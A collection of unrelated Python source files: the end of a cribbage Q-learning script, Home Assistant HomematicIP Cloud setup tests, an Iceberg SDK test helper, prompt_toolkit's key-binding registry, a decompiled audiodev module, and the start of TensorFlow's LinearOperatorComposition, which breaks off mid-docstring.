'''Select a single card from the hand to play during cribbage play.'''
if self.play_card_model is not None and random.random() > self.epsilon:
# TODO: integrate self.play_card_model
pass
return random.choice(legal_moves)
def dqlearner_vs_random(qlearner_model, _dummy_model):
'''
Plays a set of games between the Q-Learner player and a
RandomPlayer, returns the fraction that the Q-Learner player wins.
Arguments:
- `qlearner_model`: a Model object
'''
qplayer = QLearningPlayer(qlearner_model, None, epsilon=0.05)
stats = compare_players([qplayer, RandomCribbagePlayer()], 100)
return stats[0] / 100.
@numpy_memoize(ModelStore('models', ensure_exists=True).join('discard_scaling.npz'))
def get_discard_scaling():
'''
Estimates the mean and standard deviation of input vectors to the
discard() neural network.
'''
inputs = np.array(list(itertools.islice(random_discard_state_gen(), 100000)))
return inputs.mean(axis=0), inputs.std(axis=0)
# Q-learning model for discard()
def make_dqlearner(store, name):
'''
Builds a Q-learning model to learn how to discard.
Arguments:
- `store`: the ModelStore to store the Model in
- `name`: the name of the Q-learning model to create
'''
model = Model(store, name)
model.input(347)
model.hidden(150, 'rectify') # Dense
model.hidden(150, 'rectify') # Dense
model.output(52, 'linear') # Dense: top two activations indicate cards to play
model.objective('squared_error')
model.update('rmsprop')
model.update_args({'learning_rate': 0.002})
# normalise inputs to network
model.input_scaler(make_input_scaler(*get_discard_scaling()))
# validation will be performed by playing cribbage against a random
# player
model.minibatch_size(32)
model.validation_interval = 6000
return model
def record_player1_discard_sars_gen(model, epsilon):
'''
Returns an infinite generator of (s,a,r,s2) discard tuples by
playing the given model with the given epsilon value against a
random player.
Arguments:
- `model`:
- `epsilon`:
'''
while True:
discard_states, _ = record_player1_states(
QLearningPlayer(model, None, epsilon=epsilon),
RandomCribbagePlayer())
for state in discard_states:
yield state
# ------------------------------------------------------------
# Double Q-Learning
def learn_discard():
'''
Main function: learn a model to perform cribbage discards using
Q-learning.
'''
# build the two q-learning networks
dqlearner_a = make_dqlearner('models', 'dqlearner_a9')
dqlearner_a.validation_routine(functools.partial(dqlearner_vs_random, dqlearner_a))
dqlearner_b = make_dqlearner('models', 'dqlearner_b9')
dqlearner_b.validation_routine(functools.partial(dqlearner_vs_random, dqlearner_a))
learner = DQLearner(dqlearner_a, dqlearner_b,
random_discard_sars_gen,
record_player1_discard_sars_gen)
# initialise replay memory with 50,000 (s,a,r,s) tuples from random play
learner.replay_memory_init_size(50000)
# 50k: 252M
# 100k: 360M
# 150k: 353M
# 200k: 414M
# 500k: 750M
# truncate replay memory at 500K (replay memory was 1M states in Mnih)
learner.replay_memory_max_size(500000)
# e-greedy with epsilon annealed linearly from 1.0 to 0.1 over first
# 1,000,000 minibatches, and 0.1 thereafter
learner.epsilon_fn(lambda n: max(1. + (0.1 - 1.) * n / 1000000., 0.1))
# on every training loop, sample 5K (s,a,r,s) discard states and store
# in the replay memory
learner.samples_per_loop(5000)
# make the training set 312 random minibatches (sampling with
# replacement) of 32 s,a,r,s tuples (this is roughly in line with
# Mnih's "Qhat estimator updated every 10,000 updates")
learner.minibatch_size(32)
learner.minibatches_per_loop(312)
learner.choose_action_fn(choose_discard_actions)
learner.train()
if __name__ == '__main__':
learn_discard()
# ------------------------------------------------------------
# Profiling
# In [8]: cProfile.run('loop(replay_memory, dqlearner_a, dqlearner_b)', sort='time')
# 822065 function calls in 2.806 seconds
# ncalls tottime percall cumtime percall filename:lineno(function)
# 315 0.921 0.003 1.523 0.005 function_module.py:754(__call__)
# 2193 0.553 0.000 0.553 0.000 {numpy.core.multiarray.dot}
# 2505 0.187 0.000 0.593 0.000 round.py:144(play)
# 315 0.152 0.000 0.152 0.000 expt.py:258(discard_input_scaler)
# 29986 0.100 0.000 0.100 0.000 {numpy.core.multiarray.zeros}
# 2506 0.079 0.000 0.347 0.000 round.py:68(deal)
# 2506 0.076 0.000 0.089 0.000 random.py:277(shuffle)
# 9981 0.073 0.000 0.164 0.000 neural.py:111(play_state_repr)
# 2827 0.060 0.000 0.060 0.000 {numpy.core.multiarray.array}
# 9981 0.036 0.000 0.293 0.000 neural.py:268(play_card)
# 24974 0.035 0.000 0.035 0.000 neural.py:41(encode_categories)
# 22469 0.031 0.000 0.039 0.000 random.py:273(choice)
# 64234 0.031 0.000 0.031 0.000 neural.py:28(one_hot)
|
|
"""Test HomematicIP Cloud setup process."""
from asynctest import CoroutineMock, Mock, patch
from homematicip.base.base_connection import HmipConnectionError
from homeassistant.components.homematicip_cloud.const import (
CONF_ACCESSPOINT,
CONF_AUTHTOKEN,
DOMAIN as HMIPC_DOMAIN,
HMIPC_AUTHTOKEN,
HMIPC_HAPID,
HMIPC_NAME,
)
from homeassistant.components.homematicip_cloud.hap import HomematicipHAP
from homeassistant.config_entries import (
ENTRY_STATE_LOADED,
ENTRY_STATE_NOT_LOADED,
ENTRY_STATE_SETUP_ERROR,
ENTRY_STATE_SETUP_RETRY,
)
from homeassistant.const import CONF_NAME
from homeassistant.setup import async_setup_component
from tests.common import MockConfigEntry
async def test_config_with_accesspoint_passed_to_config_entry(hass):
"""Test that config for a accesspoint are loaded via config entry."""
entry_config = {
CONF_ACCESSPOINT: "ABC123",
CONF_AUTHTOKEN: "123",
CONF_NAME: "name",
}
# no config_entry exists
assert len(hass.config_entries.async_entries(HMIPC_DOMAIN)) == 0
# no acccesspoint exists
assert not hass.data.get(HMIPC_DOMAIN)
assert await async_setup_component(hass, HMIPC_DOMAIN, {HMIPC_DOMAIN: entry_config})
# config_entry created for access point
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
assert config_entries[0].data == {
"authtoken": "123",
"hapid": "ABC123",
"name": "name",
}
# defined access_point created for config_entry
assert isinstance(hass.data[HMIPC_DOMAIN]["ABC123"], HomematicipHAP)
async def test_config_already_registered_not_passed_to_config_entry(hass):
"""Test that an already registered accesspoint does not get imported."""
mock_config = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC123", HMIPC_NAME: "name"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config).add_to_hass(hass)
# one config_entry exists
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
assert config_entries[0].data == {
"authtoken": "123",
"hapid": "ABC123",
"name": "name",
}
# config_enty has no unique_id
assert not config_entries[0].unique_id
entry_config = {
CONF_ACCESSPOINT: "ABC123",
CONF_AUTHTOKEN: "123",
CONF_NAME: "name",
}
assert await async_setup_component(hass, HMIPC_DOMAIN, {HMIPC_DOMAIN: entry_config})
# no new config_entry created / still one config_entry
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
assert config_entries[0].data == {
"authtoken": "123",
"hapid": "ABC123",
"name": "name",
}
# config_enty updated with unique_id
assert config_entries[0].unique_id == "ABC123"
async def test_load_entry_fails_due_to_connection_error(hass, hmip_config_entry):
"""Test load entry fails due to connection error."""
hmip_config_entry.add_to_hass(hass)
with patch(
"homeassistant.components.homematicip_cloud.hap.AsyncHome.get_current_state",
side_effect=HmipConnectionError,
):
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
assert hass.data[HMIPC_DOMAIN][hmip_config_entry.unique_id]
assert hmip_config_entry.state == ENTRY_STATE_SETUP_RETRY
async def test_load_entry_fails_due_to_generic_exception(hass, hmip_config_entry):
"""Test load entry fails due to generic exception."""
hmip_config_entry.add_to_hass(hass)
with patch(
"homeassistant.components.homematicip_cloud.hap.AsyncHome.get_current_state",
side_effect=Exception,
):
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
assert hass.data[HMIPC_DOMAIN][hmip_config_entry.unique_id]
assert hmip_config_entry.state == ENTRY_STATE_SETUP_ERROR
async def test_unload_entry(hass):
"""Test being able to unload an entry."""
mock_config = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC123", HMIPC_NAME: "name"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config).add_to_hass(hass)
with patch("homeassistant.components.homematicip_cloud.HomematicipHAP") as mock_hap:
instance = mock_hap.return_value
instance.async_setup = CoroutineMock(return_value=True)
instance.home.id = "1"
instance.home.modelType = "mock-type"
instance.home.name = "mock-name"
instance.home.currentAPVersion = "mock-ap-version"
instance.async_reset = CoroutineMock(return_value=True)
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
assert mock_hap.return_value.mock_calls[0][0] == "async_setup"
assert hass.data[HMIPC_DOMAIN]["ABC123"]
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
assert config_entries[0].state == ENTRY_STATE_LOADED
await hass.config_entries.async_unload(config_entries[0].entry_id)
assert config_entries[0].state == ENTRY_STATE_NOT_LOADED
assert mock_hap.return_value.mock_calls[3][0] == "async_reset"
# entry is unloaded
assert hass.data[HMIPC_DOMAIN] == {}
async def test_hmip_dump_hap_config_services(hass, mock_hap_with_service):
"""Test dump configuration services."""
with patch("pathlib.Path.write_text", return_value=Mock()) as write_mock:
await hass.services.async_call(
"homematicip_cloud", "dump_hap_config", {"anonymize": True}, blocking=True
)
home = mock_hap_with_service.home
assert home.mock_calls[-1][0] == "download_configuration"
assert home.mock_calls
assert write_mock.mock_calls
async def test_setup_services_and_unload_services(hass):
"""Test setup services and unload services."""
mock_config = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC123", HMIPC_NAME: "name"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config).add_to_hass(hass)
with patch("homeassistant.components.homematicip_cloud.HomematicipHAP") as mock_hap:
instance = mock_hap.return_value
instance.async_setup = CoroutineMock(return_value=True)
instance.home.id = "1"
instance.home.modelType = "mock-type"
instance.home.name = "mock-name"
instance.home.currentAPVersion = "mock-ap-version"
instance.async_reset = CoroutineMock(return_value=True)
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
# Check services are created
hmipc_services = hass.services.async_services()[HMIPC_DOMAIN]
assert len(hmipc_services) == 8
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 1
await hass.config_entries.async_unload(config_entries[0].entry_id)
# Check services are removed
assert not hass.services.async_services().get(HMIPC_DOMAIN)
async def test_setup_two_haps_unload_one_by_one(hass):
"""Test setup two access points and unload one by one and check services."""
# Setup AP1
mock_config = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC123", HMIPC_NAME: "name"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config).add_to_hass(hass)
# Setup AP2
mock_config2 = {HMIPC_AUTHTOKEN: "123", HMIPC_HAPID: "ABC1234", HMIPC_NAME: "name2"}
MockConfigEntry(domain=HMIPC_DOMAIN, data=mock_config2).add_to_hass(hass)
with patch("homeassistant.components.homematicip_cloud.HomematicipHAP") as mock_hap:
instance = mock_hap.return_value
instance.async_setup = CoroutineMock(return_value=True)
instance.home.id = "1"
instance.home.modelType = "mock-type"
instance.home.name = "mock-name"
instance.home.currentAPVersion = "mock-ap-version"
instance.async_reset = CoroutineMock(return_value=True)
assert await async_setup_component(hass, HMIPC_DOMAIN, {})
hmipc_services = hass.services.async_services()[HMIPC_DOMAIN]
assert len(hmipc_services) == 8
config_entries = hass.config_entries.async_entries(HMIPC_DOMAIN)
assert len(config_entries) == 2
# unload the first AP
await hass.config_entries.async_unload(config_entries[0].entry_id)
# services still exists
hmipc_services = hass.services.async_services()[HMIPC_DOMAIN]
assert len(hmipc_services) == 8
# unload the second AP
await hass.config_entries.async_unload(config_entries[1].entry_id)
# Check services are removed
assert not hass.services.async_services().get(HMIPC_DOMAIN)
|
|
# -*- coding: utf-8 -*-
import random
from icebergsdk.resources import Brand
class IcebergObjectCreateMixin(object):
"""
Some shortcuts to create commons objects
"""
def delete_at_the_end(self, obj_to_delete):
if not obj_to_delete in self._objects_to_delete:
self._objects_to_delete.append(obj_to_delete)
# Create Utils
def create_user_address(self):
user_address = self.api_handler.Address()
user_address.name = "Test"
user_address.first_name = self.api_handler.me().first_name
user_address.last_name = self.api_handler.me().last_name
user_address.address = "300 rue de charenton"
# user_address.address2
user_address.zipcode = "75012"
user_address.city = "Paris"
# user_address.state =
user_address.user = self.api_handler.me()
user_address.country = self.api_handler.Country.search({'code': 'FR'})[0][0]
# user_address.phone =
# user_address.digicode
# user_address.company
# user_address.floor
user_address.save()
return user_address
def create_application(self, namespace = "test-app-lib-python", name = "Test App Lib Python", contact_user = None):
new_application = self.api_handler.Application()
new_application.namespace = namespace
new_application.name = name
new_application.contact_user = contact_user or self.api_handler.User.me()
new_application.save()
return new_application
def create_merchant(self, name = "test-python-lib-store", application = None):
# self.assertNotEqual(application, None)
new_merchant = self.api_handler.Store()
new_merchant.name = name
# new_merchant.application = application
new_merchant.save()
return new_merchant
# Get Utils
def get_random_active_store(self):
"""
Will return a randow active store with active offers
"""
# Find a merchant
stores, meta = self.api_handler.Store.search({'status': "10"})
max_loop = len(stores)
store = None
while max_loop > 0:
store = random.choice(stores) # Return offer randomly
max_loop -= 1
product_offers = store.product_offers()
if len(product_offers) > 0:
break
self.assertNotEqual(store, None)
return store
def get_random_offer(self, application=None):
"""
Will return a random active offer
"""
store_search_params = {'status': "10"} ## active stores
if application:
store_search_params['application'] = application.id ## limited to stores of given application
print "store_search_params=%s" % store_search_params
stores, meta = self.api_handler.Store.search(store_search_params)
print "stores, meta=%s, %s" % (stores, meta)
test_store = None
for store in stores:
product_offers = store.product_offers(params = {'availability': 'in_stock', 'status': 'active'})
if len(product_offers) > 0:
test_store = store
product_offers = product_offers
break
self.assertNotEqual(test_store, None)
max_loop = len(product_offers)
while max_loop > 0:
offer = random.choice(product_offers) # Return offer randomly
max_loop -= 1
if offer.stock > 0:
break
return offer
def get_random_sku(self):
return "test-sku-%s" % random.randint(0, 1000000000)
def create_webhook(self, application, event, url, delete_at_the_end=True, active_merchant_only=True):
webhook = self.api_handler.Webhook()
webhook.application = application
webhook.event = event
webhook.url = url
webhook.active_merchant_only = active_merchant_only
webhook.save()
print "webhook=%s" % webhook.__dict__
if delete_at_the_end:
self.delete_at_the_end(webhook)
return webhook
def create_product(self, name, description, gender, categories=None, brand=None, delete_at_the_end=True):
product = self.api_handler.Product()
product.name = name
product.description = description
product.gender = gender
product.save()
if categories:
product.categories = []
for category in categories:
if type(category) == self.api_handler.Category:
## category is already a category object
category_obj = category
else:
## category is the id
category_obj = self.api_handler.Category()
category_obj.id = category
product.categories.append(category_obj)
if brand:
if isinstance(brand, Brand):
brand_obj = brand
else:
brand_obj = self.api_handler.Brand()
brand_obj.id = brand
product.brand = brand_obj
if categories or brand:
## need to save
product.save()
if delete_at_the_end:
self.delete_at_the_end(product)
return product
def create_product_offer(self, product, merchant, sku=None, is_abstract=False, image_paths=None, delete_at_the_end=True, **kwargs):
productoffer = self.api_handler.ProductOffer()
productoffer.product = product
productoffer.merchant = merchant
productoffer.is_abstract = is_abstract
if sku is not None:
productoffer.sku = sku
for key, value in kwargs.iteritems(): ## assign other params
setattr(productoffer, key, value)
productoffer.save()
if image_paths:
for image_path in image_paths:
productoffer.add_image(image_path)
if delete_at_the_end:
self.delete_at_the_end(productoffer)
return productoffer
def create_product_variation(self, product_offer, sku, gtin13=None, delete_at_the_end=True, **kwargs):
productvariation = self.api_handler.ProductVariation()
productvariation.product_offer = product_offer
productvariation.sku = sku
if gtin13 is not None:
productvariation.gtin13 = gtin13
for key, value in kwargs.iteritems(): ## assign other params
setattr(productvariation, key, value)
productvariation.save()
if delete_at_the_end:
self.delete_at_the_end(productvariation)
return productvariation
|
|
"""
Key bindings registry.
A `Registry` object is a container that holds a list of key bindings. It has a
very efficient internal data structure for checking which key bindings apply
for a pressed key.
Typical usage::
r = Registry()
@r.add_binding(Keys.ControlX, Keys.ControlC, filter=INSERT)
def handler(event):
# Handle ControlX-ControlC key sequence.
pass
It is also possible to combine multiple registries. We do this in the default
key bindings. There are some registries that contain Emacs bindings, while
others contain the Vi bindings. They are merged together using a
`MergedRegistry`.
We also have a `ConditionalRegistry` object that can enable/disable a group of
key bindings at once.
"""
from __future__ import unicode_literals
from abc import ABCMeta, abstractmethod
from prompt_toolkit.cache import SimpleCache
from prompt_toolkit.filters import CLIFilter, to_cli_filter, Never
from prompt_toolkit.keys import Key, Keys
from six import text_type, with_metaclass
__all__ = (
'BaseRegistry',
'Registry',
'ConditionalRegistry',
'MergedRegistry',
)
class _Binding(object):
"""
(Immutable binding class.)
"""
def __init__(self, keys, handler, filter=None, eager=None, save_before=None):
assert isinstance(keys, tuple)
assert callable(handler)
assert isinstance(filter, CLIFilter)
assert isinstance(eager, CLIFilter)
assert callable(save_before)
self.keys = keys
self.handler = handler
self.filter = filter
self.eager = eager
self.save_before = save_before
def call(self, event):
return self.handler(event)
def __repr__(self):
return '%s(keys=%r, handler=%r)' % (
self.__class__.__name__, self.keys, self.handler)
class BaseRegistry(with_metaclass(ABCMeta, object)):
"""
Interface for a Registry.
"""
_version = 0 # For cache invalidation.
@abstractmethod
def get_bindings_for_keys(self, keys):
pass
@abstractmethod
def get_bindings_starting_with_keys(self, keys):
pass
# `add_binding` and `remove_binding` don't have to be part of this
# interface.
class Registry(BaseRegistry):
"""
Key binding registry.
"""
def __init__(self):
self.key_bindings = []
self._get_bindings_for_keys_cache = SimpleCache(maxsize=10000)
self._get_bindings_starting_with_keys_cache = SimpleCache(maxsize=1000)
self._version = 0 # For cache invalidation.
def _clear_cache(self):
self._version += 1
self._get_bindings_for_keys_cache.clear()
self._get_bindings_starting_with_keys_cache.clear()
def add_binding(self, *keys, **kwargs):
"""
Decorator for annotating key bindings.
:param filter: :class:`~prompt_toolkit.filters.CLIFilter` to determine
when this key binding is active.
:param eager: :class:`~prompt_toolkit.filters.CLIFilter` or `bool`.
When True, ignore potential longer matches when this key binding is
hit. E.g. when there is an active eager key binding for Ctrl-X,
execute the handler immediately and ignore the key binding for
Ctrl-X Ctrl-E of which it is a prefix.
:param save_before: Callable that takes an `Event` and returns True if
we should save the current buffer, before handling the event.
(That's the default.)
"""
filter = to_cli_filter(kwargs.pop('filter', True))
eager = to_cli_filter(kwargs.pop('eager', False))
save_before = kwargs.pop('save_before', lambda e: True)
to_cli_filter(kwargs.pop('invalidate_ui', True)) # Deprecated! (ignored.)
assert not kwargs
assert keys
assert all(isinstance(k, (Key, text_type)) for k in keys), \
'Key bindings should consist of Key and string (unicode) instances.'
assert callable(save_before)
if isinstance(filter, Never):
# When a filter is Never, it will always stay disabled, so in that case
# don't bother putting it in the registry. It will slow down every key
# press otherwise.
def decorator(func):
return func
else:
def decorator(func):
self.key_bindings.append(
_Binding(keys, func, filter=filter, eager=eager,
save_before=save_before))
self._clear_cache()
return func
return decorator
def remove_binding(self, function):
"""
Remove a key binding.
This expects a function that was given to `add_binding` method as
parameter. Raises `ValueError` when the given function was not
registered before.
"""
assert callable(function)
for b in self.key_bindings:
if b.handler == function:
self.key_bindings.remove(b)
self._clear_cache()
return
# No key binding found for this function. Raise ValueError.
raise ValueError('Binding not found: %r' % (function, ))
def get_bindings_for_keys(self, keys):
"""
Return a list of key bindings that can handle this key.
(This return also inactive bindings, so the `filter` still has to be
called, for checking it.)
:param keys: tuple of keys.
"""
def get():
result = []
for b in self.key_bindings:
if len(keys) == len(b.keys):
match = True
any_count = 0
for i, j in zip(b.keys, keys):
if i != j and i != Keys.Any:
match = False
break
if i == Keys.Any:
any_count += 1
if match:
result.append((any_count, b))
# Place bindings that have more 'Any' occurences in them at the end.
result = sorted(result, key=lambda item: -item[0])
return [item[1] for item in result]
return self._get_bindings_for_keys_cache.get(keys, get)
def get_bindings_starting_with_keys(self, keys):
"""
Return a list of key bindings that handle a key sequence starting with
`keys`. (It does only return bindings for which the sequences are
longer than `keys`. And like `get_bindings_for_keys`, it also includes
inactive bindings.)
:param keys: tuple of keys.
"""
def get():
result = []
for b in self.key_bindings:
if len(keys) < len(b.keys):
match = True
for i, j in zip(b.keys, keys):
if i != j and i != Keys.Any:
match = False
break
if match:
result.append(b)
return result
return self._get_bindings_starting_with_keys_cache.get(keys, get)
class _AddRemoveMixin(BaseRegistry):
"""
Common part for ConditionalRegistry and MergedRegistry.
"""
def __init__(self):
# `Registry` to be synchronized with all the others.
self._registry2 = Registry()
self._last_version = None
# The 'extra' registry. Mostly for backwards compatibility.
self._extra_registry = Registry()
def _update_cache(self):
raise NotImplementedError
# For backwards, compatibility, we allow adding bindings to both
# ConditionalRegistry and MergedRegistry. This is however not the
# recommended way. Better is to create a new registry and merge them
# together using MergedRegistry.
def add_binding(self, *k, **kw):
return self._extra_registry.add_binding(*k, **kw)
def remove_binding(self, *k, **kw):
return self._extra_registry.remove_binding(*k, **kw)
# Proxy methods to self._registry2.
@property
def key_bindings(self):
self._update_cache()
return self._registry2.key_bindings
@property
def _version(self):
self._update_cache()
return self._last_version
def get_bindings_for_keys(self, *a, **kw):
self._update_cache()
return self._registry2.get_bindings_for_keys(*a, **kw)
def get_bindings_starting_with_keys(self, *a, **kw):
self._update_cache()
return self._registry2.get_bindings_starting_with_keys(*a, **kw)
class ConditionalRegistry(_AddRemoveMixin):
"""
Wraps around a `Registry`. Disable/enable all the key bindings according to
the given (additional) filter.::
@Condition
def setting_is_true(cli):
return True # or False
registy = ConditionalRegistry(registry, setting_is_true)
When new key bindings are added to this object. They are also
enable/disabled according to the given `filter`.
:param registries: List of `Registry` objects.
:param filter: `CLIFilter` object.
"""
def __init__(self, registry=None, filter=True):
registry = registry or Registry()
assert isinstance(registry, BaseRegistry)
_AddRemoveMixin.__init__(self)
self.registry = registry
self.filter = to_cli_filter(filter)
def _update_cache(self):
" If the original registry was changed. Update our copy version. "
expected_version = (self.registry._version, self._extra_registry._version)
if self._last_version != expected_version:
registry2 = Registry()
# Copy all bindings from `self.registry`, adding our condition.
for reg in (self.registry, self._extra_registry):
for b in reg.key_bindings:
registry2.key_bindings.append(
_Binding(
keys=b.keys,
handler=b.handler,
filter=self.filter & b.filter,
eager=b.eager,
save_before=b.save_before))
self._registry2 = registry2
self._last_version = expected_version
class MergedRegistry(_AddRemoveMixin):
"""
Merge multiple registries of key bindings into one.
This class acts as a proxy to multiple `Registry` objects, but behaves as
if this is just one bigger `Registry`.
:param registries: List of `Registry` objects.
"""
def __init__(self, registries):
assert all(isinstance(r, BaseRegistry) for r in registries)
_AddRemoveMixin.__init__(self)
self.registries = registries
def _update_cache(self):
"""
If one of the original registries was changed. Update our merged
version.
"""
expected_version = (
tuple(r._version for r in self.registries) +
(self._extra_registry._version, ))
if self._last_version != expected_version:
registry2 = Registry()
for reg in self.registries:
registry2.key_bindings.extend(reg.key_bindings)
# Copy all bindings from `self._extra_registry`.
registry2.key_bindings.extend(self._extra_registry.key_bindings)
self._registry2 = registry2
self._last_version = expected_version
|
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: audiodev.py
"""Classes for manipulating audio devices (currently only for Sun and SGI)"""
from warnings import warnpy3k
warnpy3k('the audiodev module has been removed in Python 3.0', stacklevel=2)
del warnpy3k
__all__ = [
'error', 'AudioDev']
class error(Exception):
pass
class Play_Audio_sgi:
classinited = 0
frameratelist = nchannelslist = sampwidthlist = None
def initclass(self):
import AL
self.frameratelist = [
(
48000, AL.RATE_48000),
(
44100, AL.RATE_44100),
(
32000, AL.RATE_32000),
(
22050, AL.RATE_22050),
(
16000, AL.RATE_16000),
(
11025, AL.RATE_11025),
(
8000, AL.RATE_8000)]
self.nchannelslist = [
(
1, AL.MONO),
(
2, AL.STEREO),
(
4, AL.QUADRO)]
self.sampwidthlist = [
(
1, AL.SAMPLE_8),
(
2, AL.SAMPLE_16),
(
3, AL.SAMPLE_24)]
self.classinited = 1
def __init__(self):
import al
import AL
if not self.classinited:
self.initclass()
self.oldparams = []
self.params = [
AL.OUTPUT_RATE, 0]
self.config = al.newconfig()
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
if self.port:
self.stop()
if self.oldparams:
import al
import AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def wait(self):
if not self.port:
return
import time
while self.port.getfilled() > 0:
time.sleep(0.1)
self.stop()
def stop(self):
if self.port:
self.port.closeport()
self.port = None
if self.oldparams:
import al
import AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
return
def setoutrate(self, rate):
for raw, cooked in self.frameratelist:
if rate == raw:
self.params[1] = cooked
self.inited_outrate = 1
break
else:
raise error, 'bad output rate'
def setsampwidth(self, width):
for raw, cooked in self.sampwidthlist:
if width == raw:
self.config.setwidth(cooked)
self.inited_width = 1
break
else:
if width == 0:
import AL
self.inited_width = 0
self.config.setwidth(AL.SAMPLE_16)
self.converter = self.ulaw2lin
else:
raise error, 'bad sample width'
def setnchannels(self, nchannels):
for raw, cooked in self.nchannelslist:
if nchannels == raw:
self.config.setchannels(cooked)
self.inited_nchannels = 1
break
else:
raise error, 'bad # of channels'
def writeframes(self, data):
if not (self.inited_outrate and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import al
import AL
self.port = al.openport('Python', 'w', self.config)
self.oldparams = self.params[:]
al.getparams(AL.DEFAULT_DEVICE, self.oldparams)
al.setparams(AL.DEFAULT_DEVICE, self.params)
if self.converter:
data = self.converter(data)
self.port.writesamps(data)
def getfilled(self):
if self.port:
return self.port.getfilled()
else:
return 0
def getfillable(self):
if self.port:
return self.port.getfillable()
else:
return self.config.getqueuesize()
def ulaw2lin(self, data):
import audioop
return audioop.ulaw2lin(data, 2)
class Play_Audio_sun:
def __init__(self):
self.outrate = 0
self.sampwidth = 0
self.nchannels = 0
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
self.stop()
def setoutrate(self, rate):
self.outrate = rate
self.inited_outrate = 1
def setsampwidth(self, width):
self.sampwidth = width
self.inited_width = 1
def setnchannels(self, nchannels):
self.nchannels = nchannels
self.inited_nchannels = 1
def writeframes(self, data):
if not (self.inited_outrate and self.inited_width and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import sunaudiodev
import SUNAUDIODEV
self.port = sunaudiodev.open('w')
info = self.port.getinfo()
info.o_sample_rate = self.outrate
info.o_channels = self.nchannels
if self.sampwidth == 0:
info.o_precision = 8
self.o_encoding = SUNAUDIODEV.ENCODING_ULAW
else:
info.o_precision = 8 * self.sampwidth
info.o_encoding = SUNAUDIODEV.ENCODING_LINEAR
self.port.setinfo(info)
if self.converter:
data = self.converter(data)
self.port.write(data)
def wait(self):
if not self.port:
return
self.port.drain()
self.stop()
def stop(self):
if self.port:
self.port.flush()
self.port.close()
self.port = None
return
def getfilled(self):
if self.port:
return self.port.obufcount()
else:
return 0
def AudioDev():
try:
import al
except ImportError:
try:
import sunaudiodev
return Play_Audio_sun()
except ImportError:
try:
import Audio_mac
except ImportError:
raise error, 'no audio device'
else:
return Audio_mac.Play_Audio_mac()
else:
return Play_Audio_sgi()
def test(fn=None):
import sys
if sys.argv[1:]:
fn = sys.argv[1]
else:
fn = 'f:just samples:just.aif'
import aifc
af = aifc.open(fn, 'r')
print fn, af.getparams()
p = AudioDev()
p.setoutrate(af.getframerate())
p.setsampwidth(af.getsampwidth())
p.setnchannels(af.getnchannels())
BUFSIZ = af.getframerate() / af.getsampwidth() / af.getnchannels()
while 1:
data = af.readframes(BUFSIZ)
if not data:
break
print len(data)
p.writeframes(data)
p.wait()
if __name__ == '__main__':
test()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Composes one or more `LinearOperators`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.linalg.python.ops import linear_operator
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
__all__ = ["LinearOperatorComposition"]
class LinearOperatorComposition(linear_operator.LinearOperator):
"""Composes one or more `LinearOperators`.
This operator composes one or more linear operators `[op1,...,opJ]`,
building a new `LinearOperator` with action defined by:
```
op_composed(x) := op1(op2(...(opJ(x)...))
```
If `opj` acts like [batch] matrix `Aj`, then `op_composed` acts like the
[batch] matrix formed with the multiplication `A1 A2...AJ`.
If `opj` has shape `batch_shape_j + [M_j, N_j]`, then we must have
`N_j = M_{j+1}`, in which case the composed operator has shape equal to
`broadcast_batch_shape + [M_1, N_J]`, where `broadcast_batch_shape` is the
mutual broadcast of `batch_shape_j`, `j = 1,...,J`, assuming the intermediate
batch shapes broadcast. Even if the composed shape is well defined, the
composed operator's methods may fail due to lack of broadcasting ability in
the defining operators' methods.
```python
# Create a 2 x 2 linear operator composed of two 2 x 2 operators.
operator_1 = LinearOperatorFullMatrix([[1., 2.], [3., 4.]])
operator_2 = LinearOperatorFullMatrix([[1., 0.], [0., 1.]])
operator = LinearOperatorComposition([operator_1, operator_2])
operator.to_dense()
==> [[1., 2.]
[3., 4.]]
operator.shape
==> [2, 2]
operator.log_abs_determinant()
==> scalar Tensor
x = ... Shape [2, 4] Tensor
operator.matmul(x)
==> Shape [2, 4] Tensor
# Create a [2, 3] batch of 4 x 5 linear operators.
matrix_45 = tf.random_normal(shape=[2, 3, 4, 5])
operator_45 = LinearOperatorFullMatrix(matrix)
